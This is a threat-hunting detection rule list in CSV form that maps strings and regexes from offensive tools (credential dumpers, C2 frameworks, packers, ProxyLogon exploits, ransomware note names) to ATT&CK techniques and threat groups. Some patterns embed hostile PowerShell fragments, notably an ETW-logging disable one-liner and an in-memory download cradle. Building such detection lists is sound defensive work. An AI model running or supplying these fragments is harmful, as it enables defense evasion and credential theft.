"*[Invoke-RevertToSelf] Token impersonation successfully reverted*",".{0,1000}\[Invoke\-RevertToSelf\]\sToken\simpersonation\ssuccessfully\sreverted.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13481"
"*[Invoke-UserImpersonation] Alternate credentials successfully impersonated*",".{0,1000}\[Invoke\-UserImpersonation\]\sAlternate\scredentials\ssuccessfully\simpersonated.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13482"
"*[IO.File]::ReadAllText(*stubps1tovbs.ps1*",".{0,1000}\[IO\.File\]\:\:ReadAllText\(.{0,1000}stubps1tovbs\.ps1.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13483"
"*[IO.File]::WriteAllBytes(""*.kirbi**",".{0,1000}\[IO\.File\]\:\:WriteAllBytes\(\"".{0,1000}\.kirbi.{0,1000}.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","13484"
"*[KeeFarceDLL]*",".{0,1000}\[KeeFarceDLL\].{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","13486"
"*[LOLSpoof] > *",".{0,1000}\[LOLSpoof\]\s\>\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","13487"
"*[MetasploitCoop-Backend]*",".{0,1000}\[MetasploitCoop\-Backend\].{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","0","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","13490"
"*[MetasploitCoop-Frontend]*",".{0,1000}\[MetasploitCoop\-Frontend\].{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","0","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","13491"
"*[Ngrok Tunnel URL*",".{0,1000}\[Ngrok\sTunnel\sURL.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","13492"
"*[o365spray]*",".{0,1000}\[o365spray\].{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","13493"
"*[PEzor] cleanup complete*",".{0,1000}\[PEzor\]\scleanup\scomplete.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","13495"
"*[PEzor] payload freed*",".{0,1000}\[PEzor\]\spayload\sfreed.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","13496"
"*[PEzor] starting BOF*",".{0,1000}\[PEzor\]\sstarting\sBOF.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","13497"
"*[PRIVESC] Giving token full privileges for PID*",".{0,1000}\[PRIVESC\]\sGiving\stoken\sfull\sprivileges\sfor\sPID.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#content","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","13499"
"*[PRIVESC] Stealing token from PID *",".{0,1000}\[PRIVESC\]\sStealing\stoken\sfrom\sPID\s.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#content","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","13500"
"*[Reflection.Assembly]::Load(*[Char](*)+[Char](*)+*+[Char](*)*",".{0,1000}\[Reflection\.Assembly\]\:\:Load\(.{0,1000}\[Char\]\(.{0,1000}\)\+\[Char\]\(.{0,1000}\)\+.{0,1000}\+\[Char\]\(.{0,1000}\).{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","powershell scriptblock","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","13501"
"*[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled'*'NonPublic*Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider'*'NonPublic*Static').GetValue($null)*0)*",".{0,1000}\[Reflection\.Assembly\]\:\:LoadWithPartialName\(\'System\.Core\'\)\.GetType\(\'System\.Diagnostics\.Eventing\.EventProvider\'\)\.GetField\(\'m_enabled\'.{0,1000}\'NonPublic.{0,1000}Instance\'\)\.SetValue\(\[Ref\]\.Assembly\.GetType\(\'System\.Management\.Automation\.Tracing\.PSEtwLogProvider\'\)\.GetField\(\'etwProvider\'.{0,1000}\'NonPublic.{0,1000}Static\'\)\.GetValue\(\$null\).{0,1000}0\).{0,1000}","offensive_tool_keyword","powershell","impair the defenses of the targeted system by disabling ETW logging for PowerShell. This can make it difficult for security teams to monitor and analyze PowerShell activities on the system potentially allowing adversaries to perform malicious actions without being detected","T1562","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13502"
"*[SharpDPAPI.Program]::Main(""machinemasterkeys"")*",".{0,1000}\[SharpDPAPI\.Program\]\:\:Main\(\""machinemasterkeys\""\).{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#content","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","13503"
"*['spawnto']*",".{0,1000}\[\'spawnto\'\].{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","13504"
"*[SQLC2 Agent Job]*",".{0,1000}\[SQLC2\sAgent\sJob\].{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","13505"
"*[START]: Password spraying attack!*",".{0,1000}\[START\]\:\sPassword\sspraying\sattack!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","13506"
"*[STEALER] Bypass Finished*",".{0,1000}\[STEALER\]\sBypass\sFinished.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","13507"
"*[string]$Class = ""PMEClass""*",".{0,1000}\[string\]\$Class\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","13508"
"*[System.Reflection.Assembly]::Load((Invoke-WebRequest *.exe*while ($true){Start-Sleep -s 1000}*",".{0,1000}\[System\.Reflection\.Assembly\]\:\:Load\(\(Invoke\-WebRequest\s.{0,1000}\.exe.{0,1000}while\s\(\$true\)\{Start\-Sleep\s\-s\s1000\}.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","13513"
"*[System.Text.Encoding]::Unicode.GetBytes(""[scriptblock]*$x={$CommandDoc};*$x.Invoke()*",".{0,1000}\[System\.Text\.Encoding\]\:\:Unicode\.GetBytes\(\""\[scriptblock\].{0,1000}\$x\=\{\$CommandDoc\}\;.{0,1000}\$x\.Invoke\(\).{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","13514"
"*[System.Windows.Forms.MessageBox]::Show(""Congratulations, it looks like, your download cradle is working*",".{0,1000}\[System\.Windows\.Forms\.MessageBox\]\:\:Show\(\""Congratulations,\sit\slooks\slike,\syour\sdownload\scradle\sis\sworking.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","13515"
"*[System[Provider[@Name='Microsoft-Windows-Windows Defender'] and (EventID=5007)]]*",".{0,1000}\[System\[Provider\[\@Name\=\'Microsoft\-Windows\-Windows\sDefender\'\]\sand\s\(EventID\=5007\)\]\].{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","N/A","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13516"
"*[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bABzAGEAcwBzAA==*",".{0,1000}\[Text\.Encoding\]\:\:Unicode\.GetString\(\[Convert\]\:\:FromBase64String\(\'bABzAGEAcwBzAA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","13517"
"*[warn] You either fat fingered this or something else. Either way*",".{0,1000}\[warn\]\sYou\seither\sfat\sfingered\sthis\sor\ssomething\selse\.\sEither\sway.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","13518"
"*[WARNING] continuing the attack anyway!*",".{0,1000}\[WARNING\]\scontinuing\sthe\sattack\sanyway!.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hakivvi/proxylogon","1","0","#content","N/A","10","1","20","6","2022-04-23T03:21:44Z","2021-03-14T13:04:07Z","13519"
"*[WARNING] we didn't get * cookie, the attack will likely fail!*",".{0,1000}\[WARNING\]\swe\sdidn\'t\sget\s.{0,1000}\scookie,\sthe\sattack\swill\slikely\sfail!.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hakivvi/proxylogon","1","0","#content","N/A","10","1","20","6","2022-04-23T03:21:44Z","2021-03-14T13:04:07Z","13520"
"*[winPEAS.Program]::Main(*",".{0,1000}\[winPEAS\.Program\]\:\:Main\(.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","13521"
"*[winPEAS.Program]::Main*",".{0,1000}\[winPEAS\.Program\]\:\:Main.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13522"
"*[x] Cannot load NTDLL.DLL*",".{0,1000}\[x\]\sCannot\sload\sNTDLL\.DLL.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","13523"
"*[x] Failed to locate the ngentask.exe binary in the WinSxS directory*",".{0,1000}\[x\]\sFailed\sto\slocate\sthe\sngentask\.exe\sbinary\sin\sthe\sWinSxS\sdirectory.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","#content","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","13524"
"*[X] Must be elevated to triage SYSTEM credentials!*",".{0,1000}\[X\]\sMust\sbe\selevated\sto\striage\sSYSTEM\scredentials!.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#content","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","13525"
"*[X] Must be elevated to triage SYSTEM masterkeys!*",".{0,1000}\[X\]\sMust\sbe\selevated\sto\striage\sSYSTEM\smasterkeys!.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#content","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","13526"
"*[X] Must be elevated to triage SYSTEM vaults!*",".{0,1000}\[X\]\sMust\sbe\selevated\sto\striage\sSYSTEM\svaults!.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#content","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","13527"
"*[X] No users found to Kerberoast!*",".{0,1000}\[X\]\sNo\susers\sfound\sto\sKerberoast!.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","13528"
"*[X] Not in high integrity, unable to MiniDump!*",".{0,1000}\[X\]\sNot\sin\shigh\sintegrity,\sunable\sto\sMiniDump!.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#content","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","13529"
"*[X] ShellCode Property Created*",".{0,1000}\[X\]\sShellCode\sProperty\sCreated.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","#content","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","13530"
"*[X] Uploading Shellcode into target*",".{0,1000}\[X\]\sUploading\sShellcode\sinto\starget.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","#content","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","13531"
"*[X] You need to be in high integrity to apply a ticket to a different logon session*",".{0,1000}\[X\]\sYou\sneed\sto\sbe\sin\shigh\sintegrity\sto\sapply\sa\sticket\sto\sa\sdifferent\slogon\ssession.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","13532"
"*[X] Your harvest exploded:*",".{0,1000}\[X\]\sYour\sharvest\sexploded\:.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","13533"
"*\ rev_shell.py*",".{0,1000}\\\srev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","13534"
"*\!!!file was stolen!!!.txt*",".{0,1000}\\!!!file\swas\sstolen!!!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13535"
"*\!!!READ_ME_MEDUSA!!!.txt*",".{0,1000}\\!!!READ_ME_MEDUSA!!!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13536"
"*\!!!start leak file!!!.txt*",".{0,1000}\\!!!start\sleak\sfile!!!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13537"
"*\!_^_README_NOTES_RAGNAR_^_!.txt*",".{0,1000}\\!_\^_README_NOTES_RAGNAR_\^_!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13538"
"*\!_karakurt_READ_ME_!.txt*",".{0,1000}\\!_karakurt_READ_ME_!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13539"
"*\!_WHATS_HAPPENED_!.txt*",".{0,1000}\\!_WHATS_HAPPENED_!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13540"
"*\!_WHY_FILES_ARE_ENCRYPTED_!.txt*",".{0,1000}\\!_WHY_FILES_ARE_ENCRYPTED_!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13541"
"*\""-SecureString\"" OR \""-AsPlainText\"" OR \""Net.NetworkCredential\""*",".{0,1000}\\\""\-SecureString\\\""\sOR\s\\\""\-AsPlainText\\\""\sOR\s\\\""Net\.NetworkCredential\\\"".{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","13542"
"*\#BlackHunt_ReadMe.html*",".{0,1000}\\\#BlackHunt_ReadMe\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13543"
